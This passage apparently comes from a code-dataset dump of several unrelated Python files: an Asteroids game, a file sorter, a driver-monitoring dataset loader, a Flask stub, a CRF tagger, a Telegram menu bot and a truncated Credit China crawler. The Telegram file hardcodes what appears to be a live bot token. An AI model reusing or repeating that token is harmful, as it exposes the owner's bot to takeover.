debris3_blue.png, debris4_blue.png, debris_blend.png\ndebris_info = ImageInfo([320, 240], [640, 480])\ndebris_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/debris2_blue.png\")\n\n# nebula images - nebula_brown.png, nebula_blue.png\nnebula_info = ImageInfo([400, 300], [800, 600])\nnebula_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/nebula_blue.f2014.png\")\n\n# splash image\nsplash_info = ImageInfo([200, 150], [400, 300])\nsplash_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/splash.png\")\n\n# ship image\nship_info = ImageInfo([45, 45], [90, 90], 35)\nship_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/double_ship.png\")\n\n# missile image - shot1.png, shot2.png, shot3.png\nmissile_info = ImageInfo([5,5], [10, 10], 3, 55)\nmissile_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/shot1.png\")\n\n# asteroid images - asteroid_blue.png, asteroid_brown.png, asteroid_blend.png\nasteroid_info = ImageInfo([45, 45], [90, 90], 40)\nasteroid_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/asteroid_blue.png\")\n\n# animated explosion - explosion_orange.png, explosion_blue.png, explosion_blue2.png, explosion_alpha.png\nexplosion_info = ImageInfo([64, 64], [128, 128], 17, 48, True)\nexplosion_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/explosion_alpha.png\")\n\n# sound assets purchased from sounddogs.com, please do not redistribute\n# .ogg versions of sounds are also available, just replace .mp3 by .ogg\n#soundtrack = simplegui.load_sound(\"http://commondatastorage.googleapis.com/codeskulptor-assets/sounddogs/soundtrack.mp3\")\nmissile_sound = simplegui.load_sound(\"http://commondatastorage.googleapis.com/codeskulptor-assets/sounddogs/missile.mp3\")\nmissile_sound.set_volume(.5)\nship_thrust_sound = simplegui.load_sound(\"http://commondatastorage.googleapis.com/codeskulptor-assets/sounddogs/thrust.mp3\")\nexplosion_sound = simplegui.load_sound(\"http://commondatastorage.googleapis.com/codeskulptor-assets/sounddogs/explosion.mp3\")\n\n# alternative upbeat soundtrack by composer and former IIPP student Emiel Stopler\n# please do not 
redistribute without permission from Emiel at http://www.filmcomposer.nl\nsoundtrack = simplegui.load_sound(\"https://storage.googleapis.com/codeskulptor-assets/ricerocks_theme.mp3\")\n\n# helper functions\ndef angle_to_vector(ang):\n return [math.cos(ang), math.sin(ang)]\n\ndef dist(p, q):\n return math.sqrt((p[0] - q[0]) ** 2 + (p[1] - q[1]) ** 2)\n\ndef random_angle():\n return random.randrange(12) * math.pi / 6\n\ndef process_sprite_group(group, canvas):\n \"\"\"updates and draws every sprite in a set; removes sprite if appropriate (for missiles)\"\"\"\n remove_set = set([])\n for sprite in set(group):\n if sprite.update():\n remove_set.add(sprite)\n else:\n sprite.draw(canvas)\n group.difference_update(remove_set)\n \ndef group_collide(group, other_object):\n \"\"\"(returns True and removes other_object iff it has collided with any object in given group\"\"\"\n remove_set = set([])\n for object in set(group):\n if object.collide(other_object):\n remove_set.add(object)\n explosion_group.add(Sprite(object.get_position(), [0,0], 0, 0, explosion_image,\n explosion_info, explosion_sound))\n group.difference_update(remove_set)\n return len(remove_set) > 0\n\ndef group_group_collide(group1, group2):\n \"\"\"returns how many objects in group1 collided with an object in group2; removes collided objects\"\"\"\n counter = 0\n for object in set(group1):\n if group_collide(group2, object):\n counter += 1\n group1.discard(object)\n return counter\n\n\n# Ship class\nclass Ship:\n \n def __init__(self, pos, vel, angle, image, info):\n self.pos = [pos[0], pos[1]]\n self.vel = [vel[0], vel[1]]\n self.thrust = False\n self.angle = angle\n self.angle_vel = 0\n self.angle_vel_inc = 0.06\n self.forward = angle_to_vector(self.angle)\n self.missile_vel_scalar = 6\n self.image = image\n self.image_center = info.get_center()\n self.image_size = info.get_size()\n self.radius = info.get_radius()\n \n def get_position(self):\n return self.pos\n \n def get_radius(self):\n return self.radius\n \n def draw(self,canvas):\n if self.thrust:\n canvas.draw_image(self.image, [self.image_center[0] + self.image_size[0],\n self.image_center[1]],\n self.image_size, self.pos, self.image_size, self.angle)\n else:\n canvas.draw_image(self.image, self.image_center, self.image_size,\n self.pos, self.image_size, self.angle)\n \n def update(self):\n # update angle and forward vector\n self.angle = (self.angle + self.angle_vel) % (2 * math.pi)\n self.forward = angle_to_vector(self.angle)\n \n # update position\n for i in range(len(self.pos)):\n self.pos[i] = (self.pos[i] + self.vel[i]) % FRAME[i]\n\n # update velocity\n for i in range(len(self.vel)):\n if self.thrust:\n self.vel[i] += self.forward[i] * 0.1\n self.vel[i] *= 0.99 \n \n def toggle_thrust(self):\n self.thrust = not self.thrust\n if self.thrust:\n ship_thrust_sound.play()\n else:\n ship_thrust_sound.rewind()\n\n def increment_angle_vel(self):\n self.angle_vel += self.angle_vel_inc\n \n def decrement_angle_vel(self):\n self.angle_vel -= self.angle_vel_inc \n \n def shoot(self):\n global missile_group\n missile_pos = [self.pos[0] + self.radius * self.forward[0],\n self.pos[1] + self.radius * self.forward[1]]\n missile_vel = [self.vel[0] + self.missile_vel_scalar * self.forward[0],\n self.vel[1] + self.missile_vel_scalar * self.forward[1]]\n missile_group.add(Sprite(missile_pos, missile_vel, self.angle, 0, missile_image, missile_info, missile_sound))\n \n\n# Sprite class\nclass Sprite:\n def __init__(self, pos, vel, ang, ang_vel, image, info, sound = None):\n self.pos = 
[pos[0],pos[1]]\n self.vel = [vel[0],vel[1]]\n self.angle = ang\n self.angle_vel = ang_vel\n self.image = image\n self.image_center = info.get_center()\n self.image_size = info.get_size()\n self.radius = info.get_radius()\n self.lifespan = info.get_lifespan()\n self.animated = info.get_animated()\n self.age = 0\n if sound:\n sound.rewind()\n sound.play()\n \n def get_position(self):\n return self.pos\n \n def get_radius(self):\n return self.radius\n \n def collide(self, other_object):\n return dist(self.pos, other_object.get_position()) < self.radius + other_object.get_radius()\n \n def draw(self, canvas):\n if self.animated:\n current_index = self.age // 2\n canvas.draw_image(self.image, [self.image_center[0] + current_index * self.image_size[0],\n self.image_center[1]],\n self.image_size, self.pos, self.image_size)\n else:\n canvas.draw_image(self.image, self.image_center, self.image_size,\n self.pos, self.image_size, self.angle)\n \n def update(self):\n # update angle\n self.angle = (self.angle + self.angle_vel) % (2 * math.pi)\n \n # update position\n for i in range(len(self.pos)):\n self.pos[i] = (self.pos[i] + self.vel[i]) % FRAME[i]\n \n # for missiles & explosions; updates sprite age; function returns True if age exceeds lifespan\n self.age += 1\n return self.age > self.lifespan\n \n#keyup and keydown handlers\ndef keydown(key):\n for i in inputs_down:\n if key == simplegui.KEY_MAP[i]:\n inputs_down[i]()\n \ndef keyup(key):\n for i in inputs_up:\n if key == simplegui.KEY_MAP[i]:\n inputs_up[i]()\n\n# mouseclick handlers that reset UI and conditions whether splash image is drawn\ndef click(pos):\n global started, lives, score, max_rocks\n center = [WIDTH / 2, HEIGHT / 2]\n size = splash_info.get_size()\n inwidth = (center[0] - size[0] / 2) < pos[0] < (center[0] + size[0] / 2)\n inheight = (center[1] - size[1] / 2) < pos[1] < (center[1] + size[1] / 2)\n if (not started) and inwidth and inheight:\n started = True\n lives = STARTING_LIVES\n score = 0\n soundtrack.rewind()\n soundtrack.play()\n \n\ndef sound_timer_handler():\n \"\"\"Pauses the music if the frame is closed (by comparing count variables)\"\"\"\n global sound_count1\n sound_count1 = (sound_count1 + 1) % 1000\n if sound_count1 - sound_count2 > 1 and sound_count2 < 999:\n soundtrack.pause()\n \n#DRAW HANDLER\ndef draw(canvas):\n global time, lives, score, started, rock_group, min_rock_vel, max_rock_vel, rock_vel_range, sound_count2\n \n #keep these variables equal until the frame is closed\n sound_count2 = sound_count1\n \n # animate background\n time += 1\n wtime = (time / 4) % WIDTH\n center = debris_info.get_center()\n size = debris_info.get_size()\n canvas.draw_image(nebula_image, nebula_info.get_center(), nebula_info.get_size(), [WIDTH / 2, HEIGHT / 2], [WIDTH, HEIGHT])\n canvas.draw_image(debris_image, center, size, (wtime - WIDTH / 2, HEIGHT / 2), (WIDTH, HEIGHT))\n canvas.draw_image(debris_image, center, size, (wtime + WIDTH / 2, HEIGHT / 2), (WIDTH, HEIGHT))\n \n # draw UI\n canvas.draw_text(\"Lives: \" + str(lives), [WIDTH * 0.05, HEIGHT * 0.08], 32, \"white\")\n canvas.draw_text(\"score: \" + str(score), [WIDTH * 0.8, HEIGHT * 0.08], 32, \"white\")\n \n # draw and update ship and sprites\n my_ship.draw(canvas)\n my_ship.update()\n process_sprite_group(rock_group, canvas)\n process_sprite_group(missile_group, canvas)\n process_sprite_group(explosion_group, canvas)\n\n # check for collisions and update lives, score, and max rock velocity accordingly\n if group_collide(rock_group, my_ship):\n lives -= 1\n score += 
group_group_collide(missile_group, rock_group)\n    min_rock_vel = -0.5 - (score * 0.03)\n    max_rock_vel = 0.5 + (score * 0.03)\n    rock_vel_range = max_rock_vel - min_rock_vel\n    \n    # Game Over\n    if lives == 0:\n        started = False\n        rock_group = set([])\n        soundtrack.pause()\n    \n    # draw splash screen if not started\n    if not started:\n        canvas.draw_image(splash_image, splash_info.get_center(), \n                          splash_info.get_size(), [WIDTH / 2, HEIGHT / 2], \n                          splash_info.get_size())\n    \n# timer handler that spawns a rock; rock doesn't spawn if too close to ship\ndef rock_spawner():\n    rock_pos = [random.randrange(WIDTH), random.randrange(HEIGHT)]\n    rock_vel = [random.random() * rock_vel_range + min_rock_vel,\n                random.random() * rock_vel_range + min_rock_vel]\n    rock_ang_vel = random.random() * 0.05 - 0.025\n    if ((len(rock_group) < MAX_ROCKS) and started and rock_ang_vel\n        and (dist(rock_pos, my_ship.get_position()) >= my_ship.get_radius() * SAFE_RADIUS_SCALAR)):\n        rock_group.add(Sprite(rock_pos, rock_vel, random_angle(), rock_ang_vel,\n                              asteroid_image, asteroid_info))\n    \n# initialize frame\nframe = simplegui.create_frame(\"Asteroids\", WIDTH, HEIGHT)\n\n# initialize ship and empty sprite groups\nmy_ship = Ship([WIDTH / 2, HEIGHT / 2], [0, 0], random_angle(), ship_image, ship_info)\nrock_group = set([])\nmissile_group = set([])\nexplosion_group = set([])\n\n#dictionaries for keyup and keydown handlers\ninputs_down = {\"left\": my_ship.decrement_angle_vel,\n               \"right\": my_ship.increment_angle_vel,\n               \"up\": my_ship.toggle_thrust, \"space\": my_ship.shoot}\n\ninputs_up = {\"left\": my_ship.increment_angle_vel,\n             \"right\": my_ship.decrement_angle_vel,\n             \"up\": my_ship.toggle_thrust}\n\n# register handlers\nframe.set_keyup_handler(keyup)\nframe.set_keydown_handler(keydown)\nframe.set_mouseclick_handler(click)\nframe.set_draw_handler(draw)\n\ntimer = simplegui.create_timer(1000.0, rock_spawner)\nsound_timer = simplegui.create_timer(100.0, sound_timer_handler)\n\n# get things rolling\ntimer.start()\nsound_timer.start()\nframe.start()\n","repo_name":"jaredcooney/OSSU-Computer-Science","sub_path":"Fundamentals of Computing specialization/Course 1: An Introduction to Interactive Programming in Python/Week 7 & 8: Asteroids clone.py","file_name":"Week 7 & 8: Asteroids clone.py","file_ext":"py","file_size_in_byte":14139,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
+{"seq_id":"17718231717","text":"from threading import Thread, RLock\nfrom shutil import copyfile\nfrom pathlib import Path\nimport re\nimport logging\nimport argparse\n\nparser = argparse.ArgumentParser(description=\"The program sorts your folder by folder depending on the file extension\")\nparser.add_argument('-s', '--source', help=\"Source folder\", required=True)\nparser.add_argument('-o', '--output', default='Sorted_file')\nargs = vars(parser.parse_args())\noutput_folder = Path(args.get('output'))\nstart_folder = Path(args.get('source'))\n\nfolders = []\n\n\ndef normalize(name):\n    \"\"\"Transliterates a Cyrillic string into Latin characters\"\"\"\n    CYRILLIC_SYMBOLS = \"абвгдеёжзийклмнопрстуфхцчшщъыьэюяєіїґ\"\n    TRANSLATION = (\"a\", \"b\", \"v\", \"g\", \"d\", \"e\", \"e\", \"j\", \"z\", \"i\", \"j\", \"k\", \"l\", \"m\", \"n\", \"o\", \"p\", \"r\", \"s\", \"t\", \"u\",\n                   \"f\", \"h\", \"ts\", \"ch\", \"sh\", \"sch\", \"\", \"y\", \"\", \"e\", \"yu\", \"ya\", \"je\", \"i\", \"ji\", \"g\")\n\n    TRANS = {}\n\n    for c, t in zip(CYRILLIC_SYMBOLS, TRANSLATION):\n        TRANS[ord(c)] = t\n        TRANS[ord(c.upper())] = t.upper()\n\n    return 
re.sub(r'\\W', '_', name.translate(TRANS))\n\n\ndef normalize_file(file):\n \"\"\"Функція виконує транслітерацію файлу\"\"\"\n title, extension = Path(file).name, Path(file).suffix\n return normalize(re.sub(extension, '', title)) + extension\n\n\ndef find_right_folder(extension):\n \"\"\"Функція повертає папку відповідно до розширення файлу\"\"\"\n TYPES = {\n \"imeges\": [\"JPEG\", \"PNG\", \"JPG\", \"SVG\"],\n \"video\": [\"AVI\", \"MP4\", \"MOV\", \"MKV\"],\n \"documents\": [\"DOC\", \"DOCX\", \"TXT\", \"PDF\", \"XLSX\", \"PPTX\"],\n \"audio\": [\"MP3\", \"OGG\", \"WAV\", \"AMR\"],\n \"archives\": [\"ZIP\", \"GZ\", \"TAR\"]\n }\n for key, value in TYPES.items():\n for val in value:\n if val == extension or val == extension.upper():\n return key\n return \"other\"\n\n\ndef folder_search(path: Path):\n \"\"\"Функція виконує пошук всіх папок в папці\"\"\"\n for el in path.iterdir():\n if el.is_dir():\n folders.append(el)\n folder_search(el)\n\n\ndef sort_file(path: Path):\n \"\"\"Функція копіює файли в нову папку відповідно до типу файлу\"\"\"\n for el in path.iterdir():\n if el.is_file():\n extension = el.suffix[1:]\n new_folder = output_folder/find_right_folder(extension)\n try:\n new_folder.mkdir(exist_ok=True, parents=True)\n copyfile(el, new_folder / normalize_file(el.name))\n\n except OSError as e:\n logging.error(e)\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.DEBUG, format=\"%(threadName)s %(message)s\")\n\n folders.append(start_folder)\n folder_search(start_folder)\n threads = []\n for folder in folders:\n th = Thread(target=sort_file, args=(folder, ))\n th.start()\n threads.append(th)\n\n [th.join() for th in threads]\n print(f\"Finished, you can delete {start_folder} folder\")\n","repo_name":"armandabasi/go-it-web-hw3","sub_path":"threading/cleaner.py","file_name":"cleaner.py","file_ext":"py","file_size_in_byte":3129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"10093682187","text":"import shutil\nimport os\nfrom torch.utils.data import DataLoader\nfrom util.utils import *\nfrom dataset.ImageFolder import ImageFolder\nfrom PIL import Image\n\n'''\nNum of Class : 11\nclasses = ['change_gear',\n 'drinking',\n 'hair_and_makeup',\n 'phonecall_left', ---> 'phonecall'\n 'phonecall_right', ---> 'phonecall'\n 'radio',\n 'reach_backseat',\n 'reach_side',\n 'safe_drive',\n 'standstill_or_waiting',\n 'talking_to_passenger',\n 'texting_left', ---> 'texting'\n 'texting_right', ---> 'texting'\n 'unclassified' ---> deprecated\n ]\n\n1) 'phonecall_left' and 'phonecall_right' are combined as phonecall\n2) 'texting_left' and 'texting_right' are combined as texting\n3) 'unclassified' is not considered as a single class\n'''\n\ndef DMD_deployment(args):\n '''\n Similar to DMD.\n However, this dataset is for deployment only with DMD dataset.\n Therefore, subject #1 used for test in 'DMD' is further divided into train/test dataset for deployment.\n Other subjects are not accessible while deployment. 
\n '''\n train_TF = get_transform('train')\n test_TF = get_transform('test')\n '''\n data shape : [bsz,depth,height,width]\n '''\n divide_subject_by_ratio(args,test_subject = args.test_subject)\n train_dataset = ImageFolder(root = '/data/DMD-Driver-Monitoring-Dataset/train_DMD_deployment', transform = train_TF)\n val_dataset = ImageFolder(root = '/data/DMD-Driver-Monitoring-Dataset/test_DMD_deployment', transform = test_TF)\n test_dataset = ImageFolder(root = '/data/DMD-Driver-Monitoring-Dataset/test_DMD_deployment', transform = test_TF)\n\n train_dataloader = DataLoader(train_dataset, batch_size = args.batch_size, shuffle = True, num_workers = 16)\n val_dataloader = DataLoader(val_dataset, batch_size = args.batch_size, shuffle = True, num_workers = 16)\n test_dataloader = DataLoader(test_dataset, batch_size = args.batch_size, shuffle = False, num_workers = 16)\n return train_dataloader, val_dataloader, test_dataloader\n\n\ndef divide_subject_by_ratio(args,test_subject = 1):\n '''\n divide subject into train/test (4:1).\n all body images are saved in \n\n file_name = [path,file_name]\n file_info = ['body',{time},{subject},{interval count},{frame count}]\n '''\n path = '/data/DMD-Driver-Monitoring-Dataset/'\n train_imgs_list = []\n test_imgs_list = []\n\n # Read .txt file\n file = open('/data/DMD-Driver-Monitoring-Dataset/body_imgs_list.txt','r')\n body_string = file.read()\n file.close()\n\n # Extracts the file which include 'driver actions' in file name\n body_file_list = body_string.split('\\n')\n for path_file_name in body_file_list:\n if 'driver_actions' in path_file_name:\n file_name = path_file_name.split('/')[-1]\n file_info = file_name.split('_')\n if int(file_info[2])==test_subject:\n test_imgs_list.append(path_file_name)\n else:\n train_imgs_list.append(path_file_name)\n if args.dataset!='DMD_deployment':\n if os.path.isfile(path+'check_subject.txt'):\n check_subject = open(path+'check_subject.txt','r')\n subject_num = check_subject.read()\n check_subject.close()\n if int(subject_num) != test_subject:\n if os.path.exists(path+'train_DMD_deployment/'):\n shutil.rmtree(path+'train_DMD_deployment/')\n if os.path.exists(path+'test_DMD_deployment/'):\n shutil.rmtree(path+'test_DMD_deployment/')\n check_subject = open(path+'check_subject.txt','w')\n check_subject.write(str(test_subject))\n check_subject.close()\n else:\n return 0\n else:\n check_subject = open(path+'check_subject.txt','w')\n check_subject.write(str(test_subject))\n check_subject.close()\n \n imgs_list_dict = {}\n for file in test_imgs_list:\n file_label = file.split('/')[-2]\n # merge labels\n if file_label in ['phonecall_left','phonecall_right']:\n file_label = 'phonecall'\n if file_label in ['texting_left','texting_right']:\n file_label = 'texting'\n if file_label in ['unclassified']:\n continue\n if file_label in imgs_list_dict:\n imgs_list_dict[file_label].append(file)\n else:\n imgs_list_dict[file_label] = [file]\n \n for label in imgs_list_dict:\n train_set = imgs_list_dict[label][:int(0.8*len(imgs_list_dict[label]))]\n test_set = imgs_list_dict[label][int(0.8*len(imgs_list_dict[label])):]\n if not os.path.exists(path+'/train_DMD_deployment/'+label):\n os.makedirs(path+'/train_DMD_deployment/'+label)\n for train_data in train_set:\n shutil.copy(train_data,path+'/train_DMD_deployment/'+label)\n if not os.path.exists(path+'/test_DMD_deployment/'+label):\n os.makedirs(path+'/test_DMD_deployment/'+label)\n for test_data in test_set:\n shutil.copy(test_data,path+'/test_DMD_deployment/'+label)\n if not 
os.path.exists(path+'/train_DMD_deployment/standstill_or_waiting'):\n        os.makedirs(path+'/train_DMD_deployment/standstill_or_waiting')\n    if not os.path.exists(path+'/test_DMD_deployment/standstill_or_waiting'):\n        os.makedirs(path+'/test_DMD_deployment/standstill_or_waiting')","repo_name":"LJY-HY/DMD","sub_path":"dataset/build_DMD_deployment.py","file_name":"build_DMD_deployment.py","file_ext":"py","file_size_in_byte":5541,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"}
+{"seq_id":"40987511904","text":"from telegram.ext import *\r\nfrom telegram import *\r\n\r\nTOKEN = \"5835529587:AAEnoYniWd8LjGJFsP47xq5_QnI9OIoSe3c\"\r\n\r\nSTART, END = 0,1\r\nONE, TWO, THREE = range(3)\r\n\r\nasync def start_bot(update: Update, context: ContextTypes.DEFAULT_TYPE) -> int:\r\n    await context.bot.send_message(chat_id=update.effective_chat.id, text=\"Hey, itz-a-me examples\")\r\n\r\n\r\nasync def start_conversation(update: Update, context: ContextTypes.DEFAULT_TYPE) -> int:\r\n    text = \"Please Choose\"\r\n    #this is 1\r\n    keyboard = [\r\n        [InlineKeyboardButton(\"1.1\", callback_data=str(ONE))],\r\n        [InlineKeyboardButton(\"END\", callback_data=str(END))]\r\n    ]\r\n\r\n    await update.message.reply_text(text= text, reply_markup=InlineKeyboardMarkup(keyboard))\r\n\r\n    return START\r\n\r\nasync def stage_one(update: Update, context: ContextTypes.DEFAULT_TYPE) -> int:\r\n    query = update.callback_query\r\n    await query.answer()\r\n    # this is 1.1\r\n    text = \"BASE 1.1\"\r\n\r\n    keyboard = [\r\n        [InlineKeyboardButton(\"1.1.1 \", callback_data=str(TWO))],\r\n        [InlineKeyboardButton(\"1.1.2\", callback_data=str(THREE))],\r\n        # [InlineKeyboardButton(\"END\", callback_data=str(END))]\r\n    ]\r\n\r\n    reply_markup = InlineKeyboardMarkup(keyboard)\r\n    await query.edit_message_text(text= text, reply_markup=reply_markup)\r\n\r\n    return START\r\n\r\nasync def stage_one_one(update: Update, context: ContextTypes.DEFAULT_TYPE) -> int:\r\n    query = update.callback_query\r\n    await query.answer()\r\n    # this is 1.1\r\n    text = \"BASE 1.1.1\"\r\n\r\n    keyboard = [\r\n        [InlineKeyboardButton(\"OPTION TEMP FOR 1.1.1 \", callback_data=str(TWO))],\r\n        [InlineKeyboardButton(\"END\", callback_data=str(END))]\r\n    ]\r\n\r\n    reply_markup = InlineKeyboardMarkup(keyboard)\r\n    await query.edit_message_text(text= text, reply_markup=reply_markup)\r\n\r\n    return START\r\n\r\nasync def stage_one_two(update: Update, context: ContextTypes.DEFAULT_TYPE) -> int:\r\n    query = update.callback_query\r\n    await query.answer()\r\n    # this is 1.1\r\n    text = \"BASE 1.1.2\"\r\n\r\n    keyboard = [\r\n        [InlineKeyboardButton(\"START BUT THIS IS 1.1.2 \", callback_data=str(ONE))],\r\n        [InlineKeyboardButton(\"END\", callback_data=str(END))]\r\n    ]\r\n\r\n    reply_markup = InlineKeyboardMarkup(keyboard)\r\n    await query.edit_message_text(text= text, reply_markup=reply_markup)\r\n\r\n    return END\r\n\r\nasync def end(update: Update, context: ContextTypes.DEFAULT_TYPE) -> int:\r\n    query = update.callback_query\r\n    await query.answer()\r\n    await query.edit_message_text(text=\"See you next time!\")\r\n    return ConversationHandler.END\r\n\r\ndef main():\r\n    application = Application.builder().token(TOKEN).build()\r\n    application.add_handler(CommandHandler(\"start\", start_bot))\r\n\r\n    conversation_handler = ConversationHandler(\r\n        entry_points=[MessageHandler(filters.TEXT, start_conversation)],\r\n        states={\r\n            START : [\r\n                CallbackQueryHandler(stage_one, pattern=\"^\"+str(ONE)+\"$\"),\r\n                CallbackQueryHandler(stage_one_one, pattern=\"^\"+str(TWO)+\"$\"),\r\n                CallbackQueryHandler(stage_one_two, pattern=\"^\"+str(THREE)+\"$\")\r\n            ],\r\n            END : [CallbackQueryHandler(end, pattern=\"^\"+str(END)+\"$\")]\r\n        },\r\n        
fallbacks=[CommandHandler(\"start\", start_bot)]\n )\n application.add_handler(conversation_handler)\n application.run_polling()\nmain()","repo_name":"ayushxpatne/cafe-decider-bot-nagpur","sub_path":"examples/exampleInline.py","file_name":"exampleInline.py","file_ext":"py","file_size_in_byte":3286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17706325776","text":"from flask import Flask, render_template, request, jsonify\nfrom flask_restful import Resource, Api, reqparse\nimport logging\nimport sys\nsys.stdout.flush()\napp = Flask(__name__, static_url_path='')\napi = Api(app)\nparser = reqparse.RequestParser()\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n#\n# @app.route('/api/scrapeUrl', methods=['POST'])\n# def scrapeUrl():\n# app.logger.info(request.json)\n\n@app.route('/api/scrapeUrl', methods=['POST'])\ndef scrapeUrl():\n json_data = request.__dict__\n app.logger.info(json_data)\n return {'hello': 'world'}\n\n# class HelloWorld(Resource):\n# def get(self):\n# return {'hello': 'world'}\n# def post(self):\n# json_data = request.get_json()\n# #args = parser.parse_args()\n# app.logger.info(json_data)\n# return {'hello': 'world'} #json_data\n#\n# api.add_resource(HelloWorld, '/api/scrapeUrl')\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n\n#!flask/bin/python\n# from flask import Flask, render_template, request\n# import logging\n#\n# app = Flask(__name__)\n#\n# @app.route('/')\n# def index():\n# return render_template('index.html')\n#\n# @app.route('/api/scrapeUrl', methods=['POST'])\n# def create_task():\n# app.logger.info(request)\n#\n# if __name__ == '__main__':\n# app.run(debug=True)\n\n\n# from flask import Flask, render_template\n#\n# app = Flask(__name__)\n#\n# @app.route('/')\n# def index():\n# return render_template('index.html')\n#\n# if __name__ == '__main__':\n# app.run(debug=True)\n","repo_name":"adityasan92/videre","sub_path":"server/public/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72486900882","text":"import math\n\ndef solve9():\n trips = gentriples()\n for p in trips:\n a, b, c = p\n if a + b + c == 1000:\n return a * b * c\n\ndef gentriples():\n \"\"\"\n An efficient(?) 
generator for pythagorean triples\n    \"\"\"\n    triples = set()\n    a = 2\n    while True:\n        for b in range(a, math.floor((a**2 - 1) / 2) + 1):\n            c = math.sqrt(a**2 + b**2)\n            trip = (a, b, int(c))\n            if c % 1 == 0 and (trip not in triples):\n                triples.add(trip)\n                yield trip\n        a += 1\n\nif __name__ == \"__main__\":\n    print(solve9())\n","repo_name":"anlsh/euler","sub_path":"1to50/p9.py","file_name":"p9.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"72467279120","text":"product = {\"name_of\": \"Victor\",\n           \"all_of\" : [{\"human_1\": \"Victor\", \"human_2\": \"Joshua\", \"human_3\": \"Micah\",\n            \"animal_1\": \"Dog\", \"animal_3\": \"Donkey\", \"animal_4\": \"Lion\"}, \n            {\"human_7\": \"Loise\", \"human_10\": \"Queen\", \"animal_17\": \"Zebra\", \"animal_23\": \"Giraffe\"}]}\n\nfor item in product[\"all_of\"]:\n    if \"Donkey\" in item.values():\n        print(\"You already got this nah\")\n\n\n# allof = {inst : product[\"all_of\"][inst] for inst in product[\"all_of\"] if inst.startswith(\"animal\")}\n# print(allof)\n\nprice = int(1000)\nquantity = 2.5\ntotal = int(price * quantity)\nprint(total)\n\n# price_str = str(price)\n# rev_price = price_str[::-1]\n\n# if len(price_str) > 3:\n#     for i, val in enumerate(rev_price):\n#         hum_price += val\n#         if (i + 1) % 3 == 0 and i != len(rev_price) - 1:\n#             hum_price += \",\"\n\n# print(hum_price[::-1])\n\nnum1 = 16\nnum2 = 4\n\n\nprint(num1 % num2)\n\n\n","repo_name":"vickerdent/shop-central","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"4064138651","text":"from sklearn_crfsuite import CRF\n\nfrom .util import sent2features\n\n\nclass CRFModel(object):\n    def __init__(self,\n                 algorithm='lbfgs',\n                 c1=0.1,\n                 c2=0.1,\n                 max_iterations=100,\n                 all_possible_transitions=False\n                 ):\n\n        self.model = CRF(algorithm=algorithm,\n                         c1=c1,\n                         c2=c2,\n                         max_iterations=max_iterations,\n                         all_possible_transitions=all_possible_transitions)\n\n    def train(self, sentences, tag_lists):\n        features = [sent2features(s) for s in sentences]\n        self.model.fit(features, tag_lists)\n\n    def test(self, sentences):\n        features = [sent2features(s) for s in sentences]\n        pred_tag_lists = self.model.predict(features)\n        return pred_tag_lists\n","repo_name":"luopeixiang/named_entity_recognition","sub_path":"models/crf.py","file_name":"crf.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":1935,"dataset":"github-code","pt":"3"}
+{"seq_id":"2394512212","text":"# Credit China (creditchina.gov.cn) crawler\nimport threading\nfrom CH_Request.util.reqContent import reqContent\n\nclass getCreditChina(threading.Thread):\n\n    def __init__(self,comName):\n        threading.Thread.__init__(self)\n        print(\"Starting the Credit China crawler\")\n        self.comName = comName\n        self.header = {\n            \"Host\":\"public.creditchina.gov.cn\",\n            \"Connection\":\"Connection\",\n            \"Accept\":\"application/json, text/javascript, */*; q=0.01\",\n            \"User-Agent\":\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/87.0.4280.141 Safari/537.36\",\n            \"Origin\":\"https://www.creditchina.gov.cn\",\n            \"Referer\":\"https://www.creditchina.gov.cn\",\n            \"Accept-Encoding\":\"gzip, deflate, br\",\n            \"Accept-Language\":\"zh-CN,zh;q=0.9\",\n        }\n\n\n    def getuuid(self):\n        url = \"https://public.creditchina.gov.cn/private-api/catalogSearchHome\"\n        payload = {\n            \"keyword\": 
\"{}\".format(self.comName),\n            \"scenes\": \"defaultScenario\",\n            \"tableName\": \"credit_xyzx_tyshxydm\",\n            \"searchState\": \"2\",\n        }\n        res = reqContent(url=url,headers=self.header,payload=payload)\n        if res.get(\"message\") == \"成功\" or res.get(\"status\") == 1:  # '成功' means 'success' in the API response\n            dataList = res.get(\"data\").get(\"list\")\n            for i in dataList:\n                accurate_entity_name = i.get(\"accurate_entity_name\")\n                if accurate_entity_name != self.comName:\n                    print(\"The company name returned while fetching the uuid does not match the input name!\")\n                else:\n                    uuid = i.get(\"uuid\")\n                    return uuid\n        else:\n            print(\"An error occurred while fetching the uuid\")\n\n    def getDataTypeCount(self):\n        \"\"\"\n        Get the record count for each data type\n        :return:\n        \"\"\"\n        url = \"https://public.creditchina.gov.cn/private-api/searchDateTypeCount\"\n        payload = {\n            \"entityType\":\"1\",\n            \"searchState\":\"1\",\n            \"keyword\":self.comName,\n        }\n        res = reqContent(url=url,headers=self.header,payload=payload)\n        if res.get(\"message\") == \"成功\" or 